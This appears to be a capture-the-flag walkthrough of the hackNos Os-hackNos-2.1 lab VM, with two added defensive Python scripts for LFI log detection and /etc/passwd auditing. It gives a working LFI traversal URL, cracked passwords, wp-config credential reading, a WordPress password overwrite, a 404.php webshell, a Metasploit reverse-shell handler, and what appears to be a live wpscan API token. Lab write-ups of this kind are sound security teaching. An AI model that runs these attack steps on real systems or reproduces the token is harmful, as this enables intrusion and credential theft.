Target machine information
- hackNos: Os-hackNos-2.1
- Name: hackNos: Os-hackNos-2.1
- Date release: 29 Nov 2019
- Author: Rahul Gehlaut
- Difficulty : Easy to Intermediate
- Flag : 2 flags, the first for user and the second for root
- Learning : Web Application | Enumeration | Password Cracking
- Download
- Download (Mirror)
- Download (Torrent) (Magnet)
Information gathering
The target VM is configured with Host-Only networking, so the VM subnet can be read off the host's network adapter; an Nmap scan of that subnet then identifies the target IP.
➜ sudo nmap -sS -O 192.168.56.0/24
Nmap scan report for 192.168.56.104
Host is up (0.0072s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:BB:35:44 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Once the host IP is known, scan its ports and services.
Only ports 80 and 22 are open, so the entry point should be the web service. Visiting the site, the index page is Apache's default page.
A directory scan with dirsearch reveals a /tsweb directory, which turns out to be a WordPress site.
The home page source shows the version: WordPress 5.3, which is fairly recent and has no readily exploitable vulnerabilities.
For WordPress, wpscan is the obvious tool, and it did find a problem.
➜ wpscan --url http://192.168.56.104/tsweb/ --enumerate u
[i] Plugin(s) Identified:
[+] gracemedia-media-player
| Location: http://192.168.56.104/tsweb/wp-content/plugins/gracemedia-media-player/
| Latest Version: 1.0 (up to date)
| Last Updated: 2013-07-21T15:09:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
| References:
| - https://wpvulndb.com/vulnerabilities/9234
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
| - https://www.exploit-db.com/exploits/46537/
| - https://seclists.org/fulldisclosure/2019/Mar/26
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.104/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.104/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] user
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.104/tsweb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
This identified a vulnerable plugin and a username.
While using wpscan I ran into a failing database update; the problem is documented at the end of the article.
Exploitation
The plugin has a local file inclusion vulnerability that allows reading arbitrary files.
Exp:
http://192.168.56.104/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
This reads out some useful information:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
......
......
rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
Users: root, rohit, flag. The flag user's password hash is also exposed here; it cracks to topsecret, and logging in over ssh as flag succeeds.
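From the defender's side, the LFI request above leaves a clear trace in the web server's access log. The following is an added example, not code from the original writeup: it runs over a few constructed Apache access-log lines (modelled on the request shown above) and flags query parameters that carry traversal sequences or sensitive file names, decoding them so that URL-encoded variants are caught too.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache access-log lines (not taken from the target machine).
SAMPLE_LOG = """\
192.168.56.1 - - [29/Nov/2019:10:00:01 +0000] "GET /tsweb/ HTTP/1.1" 200 5123
192.168.56.1 - - [29/Nov/2019:10:00:05 +0000] "GET /tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 200 1879
192.168.56.1 - - [29/Nov/2019:10:00:09 +0000] "GET /tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 0
192.168.56.1 - - [29/Nov/2019:10:00:12 +0000] "GET /tsweb/index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 412
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL = re.compile(r'\.\./|\.\.\\')                 # ../ or ..\ sequences
SENSITIVE = re.compile(r'/etc/(passwd|shadow)|wp-config\.php')


def find_lfi_attempts(log_text):
    """Return (ip, path, param, decoded_value, status) for every request whose
    query parameters contain traversal sequences or sensitive file names."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        parts = urlsplit(m.group('target'))
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                # parse_qs already decoded once; decode again to catch double encoding
                decoded = unquote(value)
                if TRAVERSAL.search(decoded) or SENSITIVE.search(decoded):
                    hits.append((m.group('ip'), parts.path, name, decoded,
                                 int(m.group('status'))))
    return hits


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print("LFI attempt:", hit)
```

A status of 200 with a non-zero response size on such a request (the /etc/passwd line above) is the signal that the read actually succeeded, not just that it was attempted.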
- Tips
/etc/passwd:
Readable by ordinary users; it stores account information. Each line is one user and is split by colons (:) into seven fields:
- Username
- Password; x means the password is stored in /etc/shadow
- UID; 0 is root
- GID; the user's primary group
- Description (GECOS), in order: Full Name, Room Number, Work Phone, Home Phone and Other
- Home directory
- Default shell
/etc/shadow:
Readable only by root; it stores the hashed passwords and related password information. Each line is one user and is split by colons into nine fields.
The hashed password has a fixed format:
$id$salt$encrypted
id is the hashing algorithm: 1 is MD5, 5 is SHA-256, 6 is SHA-512. salt is the cryptographic salt, generated randomly by the system. encrypted is the password hash.
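The weakness exploited on this machine is that the flag account's hash sits in the password field of world-readable /etc/passwd instead of in /etc/shadow. As an added example (not part of the original writeup), the following parser splits /etc/passwd into the seven fields described above and audits the result: it reports any hash stored in /etc/passwd, identifies the algorithm from the $id$ prefix, and also flags empty password fields and extra UID 0 accounts. The sample input is constructed, modelled on the entries quoted earlier plus one deliberately bad entry.

```python
import re

# Constructed /etc/passwd sample: the entries quoted above plus a fake "backdoor" line.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
backdoor::0:0::/root:/bin/sh
"""

PASSWD_FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")
CRYPT_IDS = {"1": "MD5-crypt", "5": "SHA-256-crypt", "6": "SHA-512-crypt",
             "2b": "bcrypt", "y": "yescrypt"}
# $id$salt$encrypted, the format described in the Tips section
CRYPT_RE = re.compile(r'^\$(?P<id>[^$]+)\$(?P<salt>[^$]*)\$(?P<hash>.+)$')


def parse_passwd(text):
    """Split each non-comment line into the seven colon-separated fields."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"expected 7 colon-separated fields: {line!r}")
        entry = dict(zip(PASSWD_FIELDS, fields))
        entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        entries.append(entry)
    return entries


def audit_passwd(text):
    """Return (user, finding) tuples for the weaknesses a defender checks for."""
    findings = []
    for e in parse_passwd(text):
        pw = e["password"]
        if pw == "":
            findings.append((e["name"], "empty password field: login without a password"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            m = CRYPT_RE.match(pw)
            algo = CRYPT_IDS.get(m.group("id"), "unknown id " + m.group("id")) if m else "non-crypt value"
            findings.append((e["name"], f"password hash stored in world-readable /etc/passwd ({algo})"))
            if m and m.group("id") == "1":
                findings.append((e["name"], "MD5-crypt is fast to brute-force; migrate to SHA-512 or yescrypt"))
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra UID 0 account"))
    return findings
```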
Following the hint in the user's description field, the first flag is in /home/rohit/user.txt:
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
Privilege escalation
Information gathering
flag@hacknos:/$ id
uid=1001(flag) gid=1003(flag) groups=1003(flag)
flag@hacknos:/$ uname -a
Linux hacknos 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
The flag user has very few privileges, so we need a more capable account, such as www-data; the plan is to write a webshell.
Check the WordPress configuration file wp-config.php for the database settings.
flag@hacknos:/$ cat /var/www/html/tsweb/wp-config.php|grep DB
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'hackNos-2.com' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );
That gives us a database username and password, and logging in to mysql succeeds.
Query the WordPress usernames and password hashes:
mysql> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| user | $P$B.O0cLMNmn7EoX.JMHPnNIPuBYw6S2/ |
+------------+------------------------------------+
1 row in set (0.00 sec)
The hash cannot be cracked, so just overwrite the password directly.
mysql> UPDATE wp_users SET user_pass = MD5('lanvnal') WHERE user_login ='user';
Query OK, 1 row affected (0.05 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Log in to the admin panel, replace the theme's 404.php with a webshell, and connect with AntSword.
/tmp is writable, so just go the msf route and get a meterpreter shell.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf5 exploit(multi/handler) > exploit
Run LinEnum to gather information.
[-] It looks like we have some admin users:
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=1000(rohit) gid=1000(rohit) groups=1000(rohit),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
There are no SUID binaries usable for privilege escalation, so the goal is to take over the rohit user.
Searching the target's files for backups that might hold user passwords, an md5-hash file turns up in the /var/backups/passbkp/ directory.
$1$rohit$01Dl0NQKtgfeL08fGrggi0
It cracks to: !%hack41
Switch user and escalate directly with sudo.
flag@hacknos:/$ su rohit
Password:
rohit@hacknos:/$ sudo su
[sudo] password for rohit:
root@hacknos:/# ls /root
root.txt
root@hacknos:/# cat /root/root.txt
_______ __ __ __ #
/ \ / | / |/ | #
$$$$$$$ | ______ ______ _$$ |_ _$$ |$$ |_ #
$$ |__$$ | / \ / \ / $$ | / $$ $$ | #
$$ $$< /$$$$$$ |/$$$$$$ |$$$$$$/ $$$$$$$$$$/ #
$$$$$$$ |$$ | $$ |$$ | $$ | $$ | __ / $$ $$ | #
$$ | $$ |$$ \__$$ |$$ \__$$ | $$ |/ | $$$$$$$$$$/ #
$$ | $$ |$$ $$/ $$ $$/ $$ $$/ $$ |$$ | #
$$/ $$/ $$$$$$/ $$$$$$/ $$$$/ $$/ $$/ #
#############################################################
#############################################################
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
Blog : www.hackNos.com
Author : Rahul Gehlaut
linkedin : https://www.linkedin.com/in/rahulgehlaut/
#############################################################
Problems encountered and their solutions
wpscan cannot update
With the latest wpscan installed via Homebrew on macOS, an error occurs when wpscan updates its database.
➜ ./wpscan --update
cli_options:
api_token: pTBhWI3kRUbP8KV3vD6nCtpDussLs9dwYX7bvCSahwQ
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
cli_options:
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] Updating the Database ...
[!] Unable to get https://data.wpscan.org/local_vulnerable_files.xml.sha512 (status: 403)
Result of curl:
➜ curl https://data.wpscan.org/local_vulnerable_files.xml.sha512
error code: 1020%
Checking the GitHub project, the latest version differs quite a bit from the installed one.
The cause should be the old version: the latest release is already 3.7.7, but the brew formula has not been updated. Clone the latest source from the wpscan GitHub project and build it yourself.
➜ git clone https://github.com/wpscanteam/wpscan
➜ cd wpscan
➜ bundle install && rake install
Problems using wpscan
wpscan now requires an official API token; you can register a free account, which allows 50 uses per day.
For convenience, the API token can be stored in a file: add the following to ~/.wpscan/scan.yml:
cli_options:
api_token: YOUR_API_TOKEN